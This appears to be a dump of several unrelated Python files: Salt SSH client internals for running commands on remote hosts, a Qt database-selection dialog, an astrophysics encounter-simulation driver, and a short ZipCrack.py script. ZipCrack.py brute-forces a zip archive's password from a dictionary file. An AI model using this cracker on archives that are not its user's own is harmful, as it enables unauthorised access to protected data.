if self.ssh_pre_flight:
self.ssh_pre_file = os.path.basename(self.ssh_pre_flight)
if isinstance(argv, str):
self.argv = [argv]
else:
self.argv = argv
self.fun, self.args, self.kwargs = self.__arg_comps()
self.id = id_
self.set_path = kwargs.get("set_path", "")
self.mods = mods if isinstance(mods, dict) else {}
args = {
"host": host,
"user": user,
"port": port,
"passwd": passwd,
"priv": priv,
"priv_passwd": priv_passwd,
"timeout": timeout,
"sudo": sudo,
"tty": tty,
"mods": self.mods,
"identities_only": identities_only,
"sudo_user": sudo_user,
"remote_port_forwards": remote_port_forwards,
"winrm": winrm,
"ssh_options": ssh_options,
}
# Pre apply changeable defaults
self.minion_opts = {
"grains_cache": True,
"log_file": "salt-call.log",
}
self.minion_opts.update(opts.get("ssh_minion_opts", {}))
if minion_opts is not None:
self.minion_opts.update(minion_opts)
# Post apply system needed defaults
self.minion_opts.update(
{
"root_dir": os.path.join(self.thin_dir, "running_data"),
"id": self.id,
"sock_dir": "/",
"fileserver_list_cache_time": 3,
}
)
self.minion_config = salt.serializers.yaml.serialize(self.minion_opts)
self.target = kwargs
self.target.update(args)
self.serial = salt.payload.Serial(opts)
self.wfuncs = salt.loader.ssh_wrapper(opts, None, self.context)
self.shell = salt.client.ssh.shell.gen_shell(opts, **args)
if self.winrm:
# Determine if Windows client is x86 or AMD64
arch, _, _ = self.shell.exec_cmd("powershell $ENV:PROCESSOR_ARCHITECTURE")
self.arch = arch.strip()
self.thin = thin if thin else salt.utils.thin.thin_path(opts["cachedir"])
def __arg_comps(self):
"""
Return the function name and the arg list
"""
fun = self.argv[0] if self.argv else ""
parsed = salt.utils.args.parse_input(
self.argv[1:], condition=False, no_parse=self.opts.get("no_parse", [])
)
args = parsed[0]
kws = parsed[1]
return fun, args, kws
def _escape_arg(self, arg):
"""
Properly escape argument to protect special characters from shell
interpretation. This avoids having to do tricky argument quoting.
Effectively just escape all characters in the argument that are not
alphanumeric!
"""
if self.winrm:
return arg
return "".join(["\\" + char if re.match(r"\W", char) else char for char in arg])
def run_ssh_pre_flight(self):
"""
Run our pre_flight script before running any ssh commands
"""
script = os.path.join(tempfile.gettempdir(), self.ssh_pre_file)
self.shell.send(self.ssh_pre_flight, script)
return self.execute_script(script)
def check_thin_dir(self):
"""
check if the thindir exists on the remote machine
"""
stdout, stderr, retcode = self.shell.exec_cmd(
"test -d {}".format(self.thin_dir)
)
if retcode != 0:
return False
return True
def deploy(self):
"""
Deploy salt-thin
"""
self.shell.send(
self.thin, os.path.join(self.thin_dir, "salt-thin.tgz"),
)
self.deploy_ext()
return True
def deploy_ext(self):
"""
Deploy the ext_mods tarball
"""
if self.mods.get("file"):
self.shell.send(
self.mods["file"], os.path.join(self.thin_dir, "salt-ext_mods.tgz"),
)
return True
def run(self, deploy_attempted=False):
"""
Execute the routine, the routine can be either:
1. Execute a raw shell command
2. Execute a wrapper func
3. Execute a remote Salt command
If a (re)deploy is needed, then retry the operation after a deploy
attempt
Returns tuple of (stdout, stderr, retcode)
"""
stdout = stderr = retcode = None
if self.ssh_pre_flight:
if not self.opts.get("ssh_run_pre_flight", False) and self.check_thin_dir():
log.info(
"{} thin dir already exists. Not running ssh_pre_flight script".format(
self.thin_dir
)
)
elif not os.path.exists(self.ssh_pre_flight):
log.error(
"The ssh_pre_flight script {} does not exist".format(
self.ssh_pre_flight
)
)
else:
stdout, stderr, retcode = self.run_ssh_pre_flight()
if retcode != 0:
log.error(
"Error running ssh_pre_flight script {}".format(
self.ssh_pre_file
)
)
return stdout, stderr, retcode
log.info(
"Successfully ran the ssh_pre_flight script: {}".format(
self.ssh_pre_file
)
)
if self.opts.get("raw_shell", False):
cmd_str = " ".join([self._escape_arg(arg) for arg in self.argv])
stdout, stderr, retcode = self.shell.exec_cmd(cmd_str)
elif self.fun in self.wfuncs or self.mine:
stdout, retcode = self.run_wfunc()
else:
stdout, stderr, retcode = self.cmd_block()
return stdout, stderr, retcode
def run_wfunc(self):
"""
Execute a wrapper function
Returns tuple of (json_data, '')
"""
# Ensure that opts/grains are up to date
# Execute routine
data_cache = False
data = None
cdir = os.path.join(self.opts["cachedir"], "minions", self.id)
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, "ssh_data.p")
refresh = False
if not os.path.isfile(datap):
refresh = True
else:
passed_time = (time.time() - os.stat(datap).st_mtime) / 60
if passed_time > self.opts.get("cache_life", 60):
refresh = True
if self.opts.get("refresh_cache"):
refresh = True
conf_grains = {}
# Save conf file grains before they get clobbered
if "ssh_grains" in self.opts:
conf_grains = self.opts["ssh_grains"]
if not data_cache:
refresh = True
if refresh:
# Make the datap
# TODO: Auto expire the datap
pre_wrapper = salt.client.ssh.wrapper.FunctionWrapper(
self.opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
opts_pkg = pre_wrapper["test.opts_pkg"]() # pylint: disable=E1102
if "_error" in opts_pkg:
# Refresh failed
retcode = opts_pkg["retcode"]
ret = salt.utils.json.dumps({"local": opts_pkg})
return ret, retcode
opts_pkg["file_roots"] = self.opts["file_roots"]
opts_pkg["pillar_roots"] = self.opts["pillar_roots"]
opts_pkg["ext_pillar"] = self.opts["ext_pillar"]
opts_pkg["extension_modules"] = self.opts["extension_modules"]
opts_pkg["module_dirs"] = self.opts["module_dirs"]
opts_pkg["_ssh_version"] = self.opts["_ssh_version"]
opts_pkg["thin_dir"] = self.opts["thin_dir"]
opts_pkg["master_tops"] = self.opts["master_tops"]
opts_pkg["__master_opts__"] = self.context["master_opts"]
if "known_hosts_file" in self.opts:
opts_pkg["known_hosts_file"] = self.opts["known_hosts_file"]
if "_caller_cachedir" in self.opts:
opts_pkg["_caller_cachedir"] = self.opts["_caller_cachedir"]
else:
opts_pkg["_caller_cachedir"] = self.opts["cachedir"]
# Use the ID defined in the roster file
opts_pkg["id"] = self.id
retcode = 0
# Restore master grains
for grain in conf_grains:
opts_pkg["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts_pkg["grains"][grain] = self.target["grains"][grain]
popts = {}
popts.update(opts_pkg["__master_opts__"])
popts.update(opts_pkg)
pillar = salt.pillar.Pillar(
popts,
opts_pkg["grains"],
opts_pkg["id"],
opts_pkg.get("saltenv", "base"),
)
pillar_data = pillar.compile_pillar()
# TODO: cache minion opts in datap in master.py
data = {
"opts": opts_pkg,
"grains": opts_pkg["grains"],
"pillar": pillar_data,
}
if data_cache:
with salt.utils.files.fopen(datap, "w+b") as fp_:
fp_.write(self.serial.dumps(data))
if not data and data_cache:
with salt.utils.files.fopen(datap, "rb") as fp_:
data = self.serial.load(fp_)
opts = data.get("opts", {})
opts["grains"] = data.get("grains")
# Restore master grains
for grain in conf_grains:
opts["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts["grains"][grain] = self.target["grains"][grain]
opts["pillar"] = data.get("pillar")
wrapper = salt.client.ssh.wrapper.FunctionWrapper(
opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
wrapper.fsclient.opts["cachedir"] = opts["cachedir"]
self.wfuncs = salt.loader.ssh_wrapper(opts, wrapper, self.context)
wrapper.wfuncs = self.wfuncs
# We're running in the mine, need to fetch the arguments from the
# roster, pillar, master config (in that order)
if self.mine:
mine_args = None
mine_fun_data = None
mine_fun = self.fun
if self.mine_functions and self.fun in self.mine_functions:
mine_fun_data = self.mine_functions[self.fun]
elif opts["pillar"] and self.fun in opts["pillar"].get(
"mine_functions", {}
):
mine_fun_data = opts["pillar"]["mine_functions"][self.fun]
elif self.fun in self.context["master_opts"].get("mine_functions", {}):
mine_fun_data = self.context["master_opts"]["mine_functions"][self.fun]
if isinstance(mine_fun_data, dict):
mine_fun = mine_fun_data.pop("mine_function", mine_fun)
mine_args = mine_fun_data
elif isinstance(mine_fun_data, list):
for item in mine_fun_data[:]:
if isinstance(item, dict) and "mine_function" in item:
mine_fun = item["mine_function"]
mine_fun_data.pop(mine_fun_data.index(item))
mine_args = mine_fun_data
else:
mine_args = mine_fun_data
# If we found mine_args, replace our command's args
if isinstance(mine_args, dict):
self.args = []
self.kwargs = mine_args
elif isinstance(mine_args, list):
self.args = mine_args
self.kwargs = {}
try:
if self.mine:
result = wrapper[mine_fun](*self.args, **self.kwargs)
else:
result = self.wfuncs[self.fun](*self.args, **self.kwargs)
except TypeError as exc:
result = "TypeError encountered executing {}: {}".format(self.fun, exc)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
except Exception as exc: # pylint: disable=broad-except
result = "An Exception occurred while executing {}: {}".format(
self.fun, exc
)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
# Mimic the json data-structure that "salt-call --local" will
# emit (as seen in ssh_py_shim.py)
if isinstance(result, dict) and "local" in result:
ret = salt.utils.json.dumps({"local": result["local"]})
else:
ret = salt.utils.json.dumps({"local": {"return": result}})
return ret, retcode
def _cmd_str(self):
"""
Prepare the command string
"""
sudo = "sudo" if self.target["sudo"] else ""
sudo_user = self.target["sudo_user"]
if "_caller_cachedir" in self.opts:
cachedir = self.opts["_caller_cachedir"]
else:
cachedir = self.opts["cachedir"]
thin_code_digest, thin_sum = salt.utils.thin.thin_sum(cachedir, "sha1")
debug = ""
if not self.opts.get("log_level"):
self.opts["log_level"] = "info"
if (
salt.log.LOG_LEVELS["debug"]
>= salt.log.LOG_LEVELS[self.opts.get("log_level", "info")]
):
debug = "1"
arg_str = '''
OPTIONS.config = \
"""
{config}
"""
OPTIONS.delimiter = '{delimeter}'
OPTIONS.saltdir = '{saltdir}'
OPTIONS.checksum = '{checksum}'
OPTIONS.hashfunc = '{hashfunc}'
OPTIONS.version = '{version}'
OPTIONS.ext_mods = '{ext_mods}'
OPTIONS.wipe = {wipe}
OPTIONS.tty = {tty}
OPTIONS.cmd_umask = {cmd_umask}
OPTIONS.code_checksum = {code_checksum}
ARGS = {arguments}\n'''.format(
config=self.minion_config,
delimeter=RSTR,
saltdir=self.thin_dir,
checksum=thin_sum,
hashfunc="sha1",
version=salt.version.__version__,
ext_mods=self.mods.get("version", ""),
wipe=self.wipe,
tty=self.tty,
cmd_umask=self.cmd_umask,
code_checksum=thin_code_digest,
arguments=self.argv,
)
py_code = SSH_PY_SHIM.replace("#%%OPTS", arg_str)
py_code_enc = base64.encodebytes(py_code.encode("utf-8")).decode("utf-8")
if not self.winrm:
cmd = SSH_SH_SHIM.format(
DEBUG=debug,
SUDO=sudo,
SUDO_USER=sudo_user,
SSH_PY_CODE=py_code_enc,
HOST_PY_MAJOR=sys.version_info[0],
SET_PATH=self.set_path,
)
else:
cmd = saltwinshell.gen_shim(py_code_enc)
return cmd
def execute_script(self, script, extension="py", pre_dir=""):
"""
execute a script on the minion then delete
"""
if extension == "ps1":
ret = self.shell.exec_cmd('"powershell {}"'.format(script))
else:
if not self.winrm:
ret = self.shell.exec_cmd("/bin/sh '{}{}'".format(pre_dir, script))
else:
ret = saltwinshell.call_python(self, script)
# Remove file from target system
if not self.winrm:
self.shell.exec_cmd("rm '{}{}'".format(pre_dir, script))
else:
self.shell.exec_cmd("del {}".format(script))
return ret
def shim_cmd(self, cmd_str, extension="py"):
"""
Run a shim command.
If tty is enabled, we must scp the shim to the target system and
execute it there
"""
if not self.tty and not self.winrm:
return self.shell.exec_cmd(cmd_str)
# Write the shim to a temporary file in the default temp directory
with tempfile.NamedTemporaryFile(
mode="w+b", prefix="shim_", delete=False
) as shim_tmp_file:
shim_tmp_file.write(salt.utils.stringutils.to_bytes(cmd_str))
# Copy shim to target system, under $HOME/.<randomized name>
target_shim_file = ".{}.{}".format(
binascii.hexlify(os.urandom(6)).decode("ascii"), extension
)
if self.winrm:
target_shim_file = saltwinshell.get_target_shim_file(self, target_shim_file)
self.shell.send(shim_tmp_file.name, target_shim_file, makedirs=True)
# Remove our shim file
try:
os.remove(shim_tmp_file.name)
except OSError:
pass
ret = self.execute_script(script=target_shim_file, extension=extension)
return ret
def cmd_block(self, is_retry=False):
"""
Prepare the pre-check command to send to the subsystem
1. execute SHIM + command
2. check if SHIM returns a master request or if it completed
3. handle any master request
4. re-execute SHIM + command
5. split SHIM results from command results
6. return command results
"""
self.argv = _convert_args(self.argv)
log.debug(
"Performing shimmed, blocking command as follows:\n%s",
" ".join([str(arg) for arg in self.argv]),
)
cmd_str = self._cmd_str()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
log.trace("STDOUT %s\n%s", self.target["host"], stdout)
log.trace("STDERR %s\n%s", self.target["host"], stderr)
log.debug("RETCODE %s: %s", self.target["host"], retcode)
error = self.categorize_shim_errors(stdout, stderr, retcode)
if error:
if error == "Python environment not found on Windows system":
saltwinshell.deploy_python(self)
stdout, stderr, retcode = self.shim_cmd(cmd_str)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif error == "Undefined SHIM state":
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying thin, undefined state: {}".format(
stdout
),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
return "ERROR: {}".format(error), stderr, retcode
# FIXME: this discards output from ssh_shim if the shim succeeds. It should
# always save the shim output regardless of shim success or failure.
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if re.search(RSTR_RE, stderr):
# Found RSTR in stderr which means SHIM completed and only
# and remaining output is only from salt.
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
# RSTR was found in stdout but not stderr - which means there
# is a SHIM command for the master.
shim_command = re.split(r"\r?\n", stdout, 1)[0].strip()
log.debug("SHIM retcode(%s) and command: %s", retcode, shim_command)
if (
"deploy" == shim_command
and retcode == salt.defaults.exitcodes.EX_THIN_DEPLOY
):
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
if not self.tty:
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
return self.cmd_block()
elif not re.search(RSTR_RE, stdout):
# If RSTR is not seen in stdout with tty, then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if self.tty:
stderr = ""
else:
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif "ext_mods" == shim_command:
self.deploy_ext()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying ext_mods: {}".format(stdout),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
return stdout, stderr, retcode
def categorize_shim_errors(self, stdout_bytes, stderr_bytes, retcode):
stdout = salt.utils.stringutils.to_unicode(stdout_bytes)
stderr = salt.utils.stringutils.to_unicode(stderr_bytes)
if re.search(RSTR_RE, stdout) and stdout != RSTR + "\n":
# RSTR was found in stdout which means that the shim
# functioned without *errors* . . . but there may be shim
# commands, unless the only thing we found is RSTR
return None
if re.search(RSTR_RE, stderr):
# Undefined state
return "Undefined SHIM state"
if stderr.startswith("Permission denied"):
# SHIM was not even reached
return None
perm_error_fmt = (
"Permissions problem, target user may need " "to be root or use sudo:\n {0}"
)
errors = [
(
(),
"sudo: no tty present and no askpass program specified",
"sudo expected a password, NOPASSWD required",
),
(
(salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,),
"Python interpreter is too old",
"Python version error. Recommendation(s) follow:\n"
"- Install Python 3 on the target machine(s)\n"
"- You can use ssh_pre_flight or raw shell (-r) to install Python 3",
),
(
(salt.defaults.exitcodes.EX_THIN_CHECKSUM,),
"checksum mismatched",
"The salt thin transfer was corrupted",
),
(
(salt.defaults.exitcodes.EX_SCP_NOT_FOUND,),
"scp not found",
"No scp binary. openssh-clients package required",
),
(
(salt.defaults.exitcodes.EX_CANTCREAT,),
"salt path .* exists but is not a directory",
"A necessary path for salt thin unexpectedly exists:\n " + stderr,
),
(
(),
"sudo: sorry, you must have a tty to run sudo",
"sudo is configured with requiretty",
),
((), "Failed to open log file", perm_error_fmt.format(stderr)),
((), "Permission denied:.*/salt", perm_error_fmt.format(stderr)),
(
(),
"Failed to create directory path.*/salt",
perm_error_fmt.format(stderr),
),
(
(salt.defaults.exitcodes.EX_SOFTWARE,),
"exists but is not",
"An internal error occurred with the shim, please investigate:\n "
+ stderr,
),
(
(),
"The system cannot find the path specified",
"Python environment not found on Windows system",
),
(
(),
"is not recognized",
"Python environment not found on Windows system",
),
]
for error in errors:
if retcode in error[0] or re.search(error[1], stderr):
return error[2]
return None
def check_refresh(self, data, ret):
"""
Stub out check_refresh
"""
return
def module_refresh(self):
"""
Module refresh is not needed, stub it out
"""
return
def lowstate_file_refs(chunks):
"""
Create a list of file ref objects to reconcile
"""
refs = {}
for chunk in chunks:
saltenv = "base"
crefs = []
for state in chunk:
if state == "__env__":
saltenv = chunk[state]
elif state == "saltenv":
saltenv = chunk[state]
elif state.startswith("__"):
continue
crefs.extend(salt_refs(chunk[state]))
if crefs:
if saltenv not in refs:
refs[saltenv] = []
refs[saltenv].append(crefs)
return refs
def salt_refs(data):
"""
Pull salt file references out of the states
"""
proto = "salt://"
ret = []
if isinstance(data, str):
if data.startswith(proto):
return [data]
if isinstance(data, list):
for comp in data:
if isinstance(comp, str):
if comp.startswith(proto):
ret.append(comp)
return ret
def mod_data(fsclient):
"""
Generate the module arguments for the shim data
"""
# TODO, change out for a fileserver backend
sync_refs = [
"modules",
"states",
"grains",
"renderers",
"returners",
]
ret = {}
envs = fsclient.envs()
ver_base = ""
for env in envs:
files = fsclient.file_list(env)
for ref in sync_refs:
mods_data = {}
pref = "_{}".format(ref)
for fn_ in sorted(files):
if fn_.startswith(pref):
if fn_.endswith((".py", ".so", ".pyx")):
full = salt.utils.url.create(fn_)
mod_path = fsclient.cache_file(full, env)
if not os.path.isfile(mod_path):
continue
mods_data[os.path.basename(fn_)] = mod_path
chunk = salt.utils.hashutils.get_hash(mod_path)
ver_base += chunk
if mods_data:
if ref in ret:
ret[ref].update(mods_data)
else:
ret[ref] = mods_data
if not ret:
return {}
ver_base = salt.utils.stringutils.to_bytes(ver_base)
ver = hashlib.sha1(ver_base).hexdigest()
ext_tar_path = os.path.join(
fsclient.opts["cachedir"], "ext_mods.{}.tgz".format(ver)
)
mods = {"version": ver, "file": ext_tar_path}
if os.path.isfile(ext_tar_path):
return mods
tfp = tarfile.open(ext_tar_path, "w:gz")
verfile = os.path.join(fsclient.opts["cachedir"], "ext_mods.ver")
with salt.utils.files.fopen(verfile, "w+") as fp_:
fp_.write(ver)
tfp.add(verfile, "ext_version")
for ref in ret:
for fn_ in ret[ref]:
tfp.add(ret[ref][fn_], os.path.join(ref, fn_))
tfp.close()
return mods
def ssh_version():
"""
Returns the version of the installed ssh command
"""
# This function needs more granular checks and to be validated against
# older versions of ssh
ret = subprocess.Popen(
["ssh", "-V"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
).communicate()
try:
version_parts = ret[1].split(b",")[0].split(b"_")[1]
parts = []
for part in version_parts:
try:
parts.append(int(part))
except ValueError:
return tuple(parts)
return tuple(parts)
except IndexError:
return (2, 0)
def _convert_args(args):
"""
Take a list of args, and convert any dicts inside the list to keyword
args in the form of `key=value`, ready to be passed to salt-ssh
"""
converted = []
for arg in args:
if isinstance(arg, dict):
for key in list(arg.keys()):
if key == "__kwarg__":
continue
converted.append("{}={}".format(key, arg[key]))
else:
converted.append(arg)
return converted
|
ZipCrack.py
|
import zipfile
import threading
def extractFile(zFile, password):
try:
zFile.extractall(pwd=password)
print("Found Passwd : ", password)
return password
except:
pass
def main():
zFile = zipfile.ZipFile('unzip.zip')
passFile = open('dictionary.txt')
for line in passFile.readlines():
password = line.strip('\n')
t = threading.Thread(target=extractFile, args=(zFile, password))
t.start()
if __name__ == '__main__':
main()
|
copy_db_dialog.py
|
#!/usr/bin/env python
#
# Copyright 2019 DFKI GmbH.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the
# following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
# NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
# USE OR OTHER DEALINGS IN THE SOFTWARE.
import threading
from PySide2.QtWidgets import QDialog, QTreeWidgetItem, QFileDialog
from PySide2.QtCore import Qt
from motion_analysis.gui.layout.copy_db_dialog_ui import Ui_Dialog
from vis_utils.io import load_json_file
from anim_utils.animation_data.skeleton_models import SKELETON_MODELS
from motion_analysis.constants import DB_URL
from anim_utils.utilities.db_interface import get_collections_by_parent_id_from_remote_db
class CopyDBDialog(QDialog, Ui_Dialog):
def __init__(self, db_url, parent=None):
QDialog.__init__(self, parent)
Ui_Dialog.setupUi(self, self)
self.db_url = db_url
self.selectButton.clicked.connect(self.slot_accept)
self.cancelButton.clicked.connect(self.slot_reject)
self.success = False
self.collection = None
t = threading.Thread(target=self.fill_tree_widget)
t.start()
def slot_accept(self):
col = self.get_collection()
if col is not None:
self.collection, c_name, c_type = col
self.success = True
self.close()
def slot_reject(self):
self.close()
def fill_tree_widget(self, parent=None):
if parent is None:
self.collectionTreeWidget.clear()
self.rootItem = QTreeWidgetItem(self.collectionTreeWidget, ["root", "root"])
self.rootItem.setExpanded(True)
# root collection has id 0
parent_id = 0
parent_item = self.rootItem
self.rootItem.setData(0, Qt.UserRole, parent_id)
else:
parent_id = parent[1]
parent_item = parent[0]
collection_list = get_collections_by_parent_id_from_remote_db(self.db_url, parent_id)
for col in collection_list:
colItem = QTreeWidgetItem(parent_item, [col[1], col[2]])
colItem.setData(0, Qt.UserRole, col[0])
self.fill_tree_widget((colItem, col[0]))
def get_collection(self):
colItem = self.collectionTreeWidget.currentItem()
if colItem is None:
return
return int(colItem.data(0, Qt.UserRole)), str(colItem.text(0)), str(colItem.text(1))
|
sim_encounters.py
|
# ------------------------------------- #
# Python Package Importing #
# ------------------------------------- #
# Importing Necessary System Packages
import sys, os, math
import numpy as np
import matplotlib as plt
import time as tp
import random as rp
from optparse import OptionParser
import glob
# Importing Multiprocessing Packages
from functools import partial
import multiprocessing as mp
import queue
import threading
# Importing cPickle/Pickle
try:
import pickle as pickle
except:
import pickle
# Import the Amuse Base Packages
from amuse import datamodel
from amuse.units import nbody_system
from amuse.units import units
from amuse.units import constants
from amuse.datamodel import particle_attributes
from amuse.io import *
from amuse.lab import *
from tycho import util, scattering
# Import the Amuse Gravity & Close-Encounter Packages
from amuse.community.smalln.interface import SmallN
from amuse.community.kepler.interface import Kepler
from amuse.community.ph4.interface import ph4
from amuse.community.secularmultiple.interface import SecularMultiple
from amuse.community.sse.interface import SSE
from amuse.datamodel.trees import BinaryTreesOnAParticleSet
from amuse.ext.orbital_elements import new_binary_from_orbital_elements
# Import the Tycho Packages
from tycho import create, util, read, write, stellar_systems, enc_patching
# Set Backend (For DRACO Only)
import matplotlib; matplotlib.use('agg')
# ------------------------------------- #
# Required Non-Seperable Functions #
# ------------------------------------- #
global job_queue
job_queue = queue.Queue()
def remote_process(desiredFunction):
while not job_queue.empty():
try:
current_clusterDir = job_queue.get()
except:
return None
desiredFunction(current_clusterDir)
job_queue.task_done()
# Announce to Terminal that the Current Task is Done
#sys.stdout.flush()
#print "\n", util.timestamp(), "Star ID", str(current_starID), "has finished processing!"
#print "\n", util.timestamp(), "There are", job_queue.qsize(), "stars left to process!"
#sys.stdout.flush()
def mpScatterExperiments(list_of_clusterDirs, desiredFunction):
for clusterDir in list_of_clusterDirs:
job_queue.put(clusterDir)
num_of_cpus = mp.cpu_count()-2
for i in range(num_of_cpus):
th = threading.Thread(target=remote_process, args=(desiredFunction,))
th.daemon = True
th.start()
job_queue.join()
def simulate_all_close_encounters(rootExecDir, **kwargs):
'''
This function will run all scatters for a single cluster in serial.
str rootExecDir -> The absolute root directory for all single cluster files.
'''
max_number_of_rotations = kwargs.get("maxRotations", 100)
max_runtime = kwargs.get("maxRunTime", 10**5) # Units Years
delta_time = kwargs.get("dt", 10) # Units Years
# Strip off Extra '/' if added by user to bring inline with os.cwd()
if rootExecDir.endswith("/"):
rootExecDir = rootExecDir[:-1]
# Define the Cluster's Name
cluster_name = rootExecDir.split("/")[-1]
# Generate List of Scattering IC HDF5 Paths
enc_dict = scattering.build_ClusterEncounterHistory(rootExecDir)
# Find all Primary Star IDs
star_IDs = enc_dict.keys() # Integer tied to StarID
# Set Up Output Directory Structure
output_MainDirectory = rootExecDir+"/Encounters"
if not os.path.exists(output_MainDirectory):
os.mkdir(output_MainDirectory)
# Initialize the Necessary Worker Lists
converter = nbody_system.nbody_to_si(1 | units.MSun, 100 |units.AU)
KepW = []
for i in range(2):
KepW.append(Kepler(unit_converter = converter, redirection = 'none'))
KepW[-1].initialize_code()
NBodyW = [scattering.initialize_GravCode(ph4), scattering.initialize_isOverCode()]
SecW = SecularMultiple()
SEVW = SSE()
# Loop Over the Stars
for star_ID in star_IDs:
# Load the Close Encounter class for the Star
EncounterHandler = scattering.CloseEncounters(enc_dict[star_ID], KeplerWorkerList = KepW, \
NBodyWorkerList = NBodyW, SecularWorker = SecW, SEVWorker = SEVW)
# Simulate Encounter
EncounterHandler.SimAllEncounters()
# Prepare Data for Pickling
file_name = output_MainDirectory+"/"+str(star_ID)+"_EncounterHandler.pk"
p_file = open(file_name, "wb")
# Remove Worker Lists from Class for Storage
EncounterHandler.kep = None
EncounterHandler.NBodyCodes = None
EncounterHandler.SecularCode = None
EncounterHandler.SEVCode = None
# Pickle EncounterHandler Class
# Note: This allows for ease-of-use when you want to revisit
# a specific star's simulation set in detail.
pickle.dump(EncounterHandler, p_file)
p_file.close()
# Note: Ensure the EncounterHandler class is deleted incase
# of a memory leak is possible in future updates.
del EncounterHandler
# Stop all Workers
for Worker in KepW+NBodyW+[SecW]+SEVW:
Worker.stop()
# ------------------------------------- #
# Defining Functions #
# ------------------------------------- #
# ------------------------------------- #
# Main Production Script #
# ------------------------------------- #
if __name__=="__main__":
import time
s_time = tp.time()
# ------------------------------------- #
# Setting up Required Variables #
# ------------------------------------- #
parser = OptionParser()
parser.add_option("-d", "--rootdirectory", dest="rootDir", default=None, type="str",
help="Enter the full directory of the Root Folder. Defaults to your CWD unless -M is on.")
parser.add_option("-M", "--doMultipleClusters", dest="doMultipleClusters", action="store_true",
help="Flag to turn on for running the script over a series of multiple clusters.")
parser.add_option("-S", "--serial", dest="doSerial", action="store_true",
help="Run the program in serial?.")
(options, args) = parser.parse_args()
if options.doMultipleClusters:
if options.rootDir != None:
rootDir = options.rootDir+'/*'
else:
print(util.timestamp(), "Please provide the path to your root directory which contains all cluster folders!", cluster_name,"...")
else:
if options.rootDir != None:
rootDir = options.rootDir
else:
rootDir = os.getcwd()
# Bring Root Directory Path Inline with os.cwd()
if rootDir.endswith("/"):
rootDir = rootDir[:-1]
doSerial = options.doSerial
base_planet_ID = 50000
# ------------------------------------- #
# Defining File/Directory Structure #
# ------------------------------------- #
if options.doMultipleClusters:
all_clusterDirs = glob.glob(rootDir+"/*/")
else:
all_clusterDirs = [rootDir+"/"]
# ------------------------------------- #
# Perform All Req. Simulations #
# ------------------------------------- #
if doSerial:
for clusterDir in all_clusterDirs:
# Announce to Terminal that the Runs are Starting
sys.stdout.flush()
print(util.timestamp(), "Cluster", clusterDir.split("/")[-2], "has begun processing!")
sys.stdout.flush()
simulate_all_close_encounters(clusterDir)
else:
# Begin Looping Through Clusters (Each Cluster is a Queued Process)
mpScatterExperiments(all_clusterDirs, simulate_all_close_encounters)
e_time = tp.time()
# Announce to Terminal that the Runs have Finished
sys.stdout.flush()
print(util.timestamp(), "All clusters have finished processing.")
print(util.timestamp(), len(all_clusterDirs), "clusters were processed in", (e_time - s_time), "seconds!")
sys.stdout.flush()
|
OLD_SociaLite.py
|
import socialite.engine.LocalEngine as LocalEngine
import socialite.engine.ClientEngine as ClientEngine
import socialite.tables.QueryVisitor as QueryVisitor
